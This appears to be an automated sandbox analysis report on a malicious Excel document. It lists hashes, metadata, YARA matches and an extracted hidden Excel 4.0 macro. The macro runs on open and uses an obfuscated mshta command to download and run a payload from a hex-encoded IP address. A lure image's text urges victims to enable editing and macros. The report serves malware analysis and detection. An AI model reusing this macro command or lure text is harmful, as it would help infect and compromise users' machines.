473bf2123f28

Filters:

File Name	Category	Type	Verdict	Actions

473bf2123f2891c1a5ebc75949cdf50260d4da3715cd7a3160d09155da8b354b

Sample File

Excel Document

MIME Type	application/vnd.ms-excel
File Size	127.59 KB
MD5	d773d0a41cc849b88290abc8ad698e84
SHA1	d2dc2ee2c586c228aad84737b96dd655a3befd7a
SHA256	473bf2123f2891c1a5ebc75949cdf50260d4da3715cd7a3160d09155da8b354b
SSDeep	3072:Wuk3hbdlylKsgqopeJBWhZFGkE+cL2NdAxEvN8B/W6X1yxYovrepMUdQ6gSz4i:Fk3hbdlylKsgqopeJBWhZFVE+W2NdAmv
ImpHash	-

File Reputation Information

Verdict	Malicious
Names	Mal/Generic-S

Office Information

Creator	xXx
Last Modified By	xXx
Create Time	2022-01-17 21:27 (UTC)
Modify Time	2022-01-17 21:59 (UTC)
Codepage	ANSI_Cyrillic
Application	Microsoft Excel
App Version	16.0
Document Security	NONE
Excel 4.0 Macros	1
Worksheets	1
Titles Of Parts	Sheet1, KEY
scale_crop	False
shared_doc	False

Controls (1)

CLSID	Control Name	Associated Vulnerability
{00020820-0000-0000-C000-000000000046}	Excel97Sheet	-

Excel 4.0 Macros (1)

Macro #1: KEY

Visibility State	HIDDEN
Triggers	document:AUTO_OPEN
Labels	AUTO_OPEN, lll
`K:18 =SET.NAME("lll","cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/c^c.h^tm^l") K:30 =EXEC(lll) K:41 =HALT()`

Extracted Image Texts (1)

Image #1: 0.JPG

                     THIS DOCUMENT IS ONLY AVAILABLE FOR DESKTOP OR LAPTOP VERSIONS OF MICROSOFT OFFICE EXCEL. Open the document in Microsoft Office. Previewing online is not available for protected documents. CLICK “ENABLE EDITING” FROM YELLOW BAR ABOVE Once you have enabled editing, please click “Enable Content” button
                    

CFB Streams (3)

Name	ID	Size	Actions
Root\Workbook	1	117.27 KB	... Actions Download File
Root\SummaryInformation	2	4.00 KB	... Actions Download File
Root\DocumentSummaryInformation	3	4.00 KB	... Actions Download File

YARA Matches (1)

Rule Name	Rule Description	Classification	Score	Actions
Document_Office_VeryHiddenMacro	Document contains very hidden Excel 4.0 macro	-	2/5	... Actions Show Ruleset Show Match

c:\users\keecfmwgj\appdata\roaming\microsoft\excel\b083a100

Dropped File

Stream

MIME Type	application/octet-stream
File Size	9.86 KB
MD5	7e582d4f27ec7d2438542438e5ad130f
SHA1	c6fc47408031c97b6f87a02e5720cd43ae7a2608
SHA256	3a355fffd1aa9dd04957db09eaf37f7dfb2d530c7dd17895b86ac236a3f2ab39
SSDeep	192:c/77p8vOO3Qlwa88RlCKpJFuL5dDmomga8ljGa4N++iK9J050rSwCAYoQs++hB5I:cR8vOOglwa88RlCKpJFuL5dDmomga8Rv
ImpHash	-

0.JPG

Extracted File

Image

Parent File	473bf2123f2891c1a5ebc75949cdf50260d4da3715cd7a3160d09155da8b354b
MIME Type	image/jpeg
File Size	94.34 KB
MD5	a04ce2e8f20187e29e41bae679805c9d
SHA1	80927b07a97332c58955012cb841988689f42921
SHA256	e52c5a7dbadab41ca7d080748b6bc0c566e2001b8e2d6d238ab94a5d2f16b202
SSDeep	1536:LY4QZAEVpZkj14m/LDW6X1ytzuD6jLvrepl+di963nGOObQLTKePzyRt4imPt:1EvZ8BnW6X1yVkovrepMA5Q6g2X4iU
ImpHash	-

Remarks (1/1)

There are no files for this filter

There are no files in this analysis

Classifications

Threat Names

Before

After

WHOIS Domain Information